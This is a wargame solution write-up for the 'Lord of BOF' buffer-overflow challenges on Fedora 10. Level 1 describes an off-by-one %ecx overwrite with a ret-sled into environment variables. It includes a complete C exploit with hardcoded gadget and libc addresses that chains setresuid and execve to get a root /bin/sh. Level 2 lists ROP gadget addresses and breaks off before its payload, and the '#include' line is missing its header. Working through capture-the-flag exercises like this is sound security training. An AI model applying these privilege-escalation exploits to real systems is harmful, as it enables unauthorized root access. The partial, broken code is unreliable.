[Lord Of Bof] Lord Of BOF Solutions ( Fedora 10 )

Solutions

Level 1

- off-by-one %ecx register overflow

; first we know about environment of Fedora 5  ;  prologue and epilogue is changed 
; by ecx register, it works as stack guard and stack shield
; normally we can't control ret address directly , but for controlling ret address, we need to know ecx(ret+4)
; but it's extremely difficult to guess %ecx register because of ALSR 
; SO we need to use off-by-one attack changing only 1 byte of ecx to 0x00
; how to attack
 first, insert 0x00 to ecx register. so there is high possibility stack that frame goes down ( to local variable)
 second, RET SLED!
 third, last 4 byte of buffer, insert address of main's epilogue for going up stack frame
 fourth, by ret-sled, epilogue is run and stack point is now increasing. then, pointer points env value
 then, we'll check what env is pointed ; cf) if the program uses 256 array sizes, %ecx register points 27th env address
; setresuid address : 0x001d3660
; pppr address : 0x080484f6
; null byte address : 0x8049704
; execve address :  0x001d27e0
; /bin/sh address : 0x00272db5
; ret address :  0x0804848f
; main's epilogue's address : 0x08048484
; payload :  ret sled ...... | epilogue  -> env : ..... setresuid pppr arg1 arg2 arg3 execve dummy arg1 arg2 arg3 ....
#include 
int main(){
char *env[]={
"1","2","3","4","5","6","7","8","9","10","11","12","13","14","15","16","17","18","19","20",
"21","22","23","24","25",
"\x60\x36\x1d",
"\xf6\x84\x04\x08"
"\xf5\x01","\x00",
"\xf5\x01","\x00",
"\xf5\x01","\x00",
"\xe0\x27\x1d",
"AAAA"
"\xb5\x2d\x27",
"\x04\x97\x04\x08"
"\x04\x97\x04\x08",
"30","31","32","33", 0 };
char *argv[] = {
"./balog",
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
"\x84\x84\x04\x08", 0};
execve("./balog",argv,env);
}

reference : https://www.exploit-db.com/papers/13098/

Level 2

- using rop

; buffer size is only 4 bytes and reset env and argv[1] ; so we can't use off-by-one attack
; ASLR and exec-shield is also on
; so we use ROP(Return Oriented Programming)

; setreuid address : 0x0020ef00
; geteuid address : 0x001d3220
; /bin/sh's each characters address : 
; execl address :  0x001d2ac0
; execve address : 0x001d27e0
; strcpy@plt : 0x80483ec
; pppr address :  0x08048666
; ppr address : 0x080484a3
; __gnome_start_

; payload :